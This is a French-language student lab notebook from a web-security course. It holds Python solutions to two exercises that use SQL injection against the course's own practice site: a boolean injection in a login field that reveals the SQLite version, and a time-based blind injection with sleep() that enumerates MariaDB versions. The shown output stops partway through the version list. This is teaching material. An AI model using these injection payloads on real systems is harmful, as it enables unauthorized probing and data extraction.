# ipl I317B Sécurité : labos
## Semaine 5 : Vulnérabilitées web (2)

### Exercice 1:
Revenons un peux en arrière sur le site de notre mauvais développeur. Nous savons que le site utilise sqlite comme système de gestion de base de donnée mais nous aimerions en identifier la version. Utilisez le site de l'exercice 1 pour récupérer cette information.

https://labosecuipl.alwaysdata.net/23/s02/ex1a/

In [4]:
import requests
from bs4 import BeautifulSoup

def get_sqlite_versions_from_web(url):
    page = requests.get(url)
    versions = []
    soup = BeautifulSoup(page.text)
    for line in soup.find_all("tr")[1:]:
        versions.append(line.find_all("td")[1].text)
    return versions

# URL de la page web contenant les numéros de version de SQLite
url = "https://www.sqlite.org/chronology.html"  # Remplacez cette URL par l'URL

def generate_sqlite_versions():
    version_list = []
    
    for major in range(3, 4):  # Choisir une plage pour la version majeure (par exemple, de 4 à 5)
        for minor in range(26, 28):  # Plage pour la version mineure (de 0 à 9)
            for revision in range(0, 5):  # Plage pour la révision (de 0 à 9)
                version = f"{major}.{minor}.{revision}"
                version_list.append(version)
    
    return version_list

def sql_test(test):
    page = requests.post(
        "https://labosecuipl.alwaysdata.net/23/s02/ex1a/",
        data={
        "login": '" or "' + test + '" = (SELECT sqlite_version());--',
        "password": ''
        }
    )

    return "Good job" in page.text

versions = get_sqlite_versions_from_web(url)
print("---DEBUT---")
for version in versions:
    res = sql_test(version)
    if(res == True): # Remove if to 
        print(res, version)
print("---FIN---")

---DEBUT---
True 3.27.2
---FIN---


### Exercice 2:
Pour ce dernier exercice, vous allez travailler un peu à l'aveugle. En effet, la page suicitant notre intérêt cette fois-ci ne contient pas grand chose à part à un bouton ... mais elle est injectable (promis) !

À vous de trouvez comment et de récupérer la version du système de gestion de base de donnée : https://labosecuipl.alwaysdata.net/23/s04/ex2/

Tips:
  - Cette fois-ci, c'est plus du sqlite : https://mariadb.com/kb/en/version/
  - Et vous travaillez à l'aveugle ;-)

In [5]:
import time


def get_all_maria_versions():
    req = requests.get("https://mariadb.org/mariadb/all-releases/")
    soup = BeautifulSoup(req.text)
    
    all_versions = []
    
    def download_href(href):
        return href and href.startswith("https://mariadb.org/download/")
    
    for version in soup.find("div", {"class": "entry-content"}).find_all("a", href=download_href):
        all_versions.append(version.text + "-MariaDB")
    
    return all_versions

def test_sqli_blind(test):
    start = time.time()
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/23/s04/ex2/",
        data={
            "id": "15 AND (" + test + " AND sleep(5));--",
        }
    )
    if (time.time()-start) > 5:  # un requête normal non-sleepé mettra largement moins de 5 secondes.
        return True
    else:
        return False
    
for version in get_all_maria_versions():
    injection = "VERSION()='" + version + "'"
    print(injection, end=" ")
    
    if test_sqli_blind(injection):
        print("Trouvé !")
        print(version)
        break
    else:
        print("Non ...")

VERSION()='11.3.0-MariaDB' Non ...
VERSION()='11.2.1-MariaDB' Non ...
VERSION()='11.2.0-MariaDB' Non ...
VERSION()='11.1.2-MariaDB' Non ...
VERSION()='11.1.1-MariaDB' Non ...
VERSION()='11.1.0-MariaDB' Non ...
VERSION()='11.0.3-MariaDB' Non ...
VERSION()='11.0.2-MariaDB' Non ...
VERSION()='11.0.1-MariaDB' Non ...
VERSION()='11.0.0-MariaDB' Non ...
VERSION()='10.11.5-MariaDB' Non ...
VERSION()='10.11.4-MariaDB' Non ...
VERSION()='10.11.3-MariaDB' Non ...
VERSION()='10.11.2-MariaDB' Non ...
VERSION()='10.11.1-MariaDB' Non ...
VERSION()='10.11.0-MariaDB' Non ...
VERSION()='10.10.6-MariaDB' Non ...
VERSION()='10.10.5-MariaDB' Non ...
VERSION()='10.10.4-MariaDB' Non ...
VERSION()='10.10.3-MariaDB' Non ...
VERSION()='10.10.2-MariaDB' Non ...
VERSION()='10.10.1-MariaDB' Non ...
VERSION()='10.10.0-MariaDB' Non ...
VERSION()='10.9.8-MariaDB' Non ...
VERSION()='10.9.7-MariaDB' Non ...
VERSION()='10.9.6-MariaDB' Non ...
VERSION()='10.9.5-MariaDB' Non ...
VERSION()='10.9.4-MariaDB' Non ...
VERSION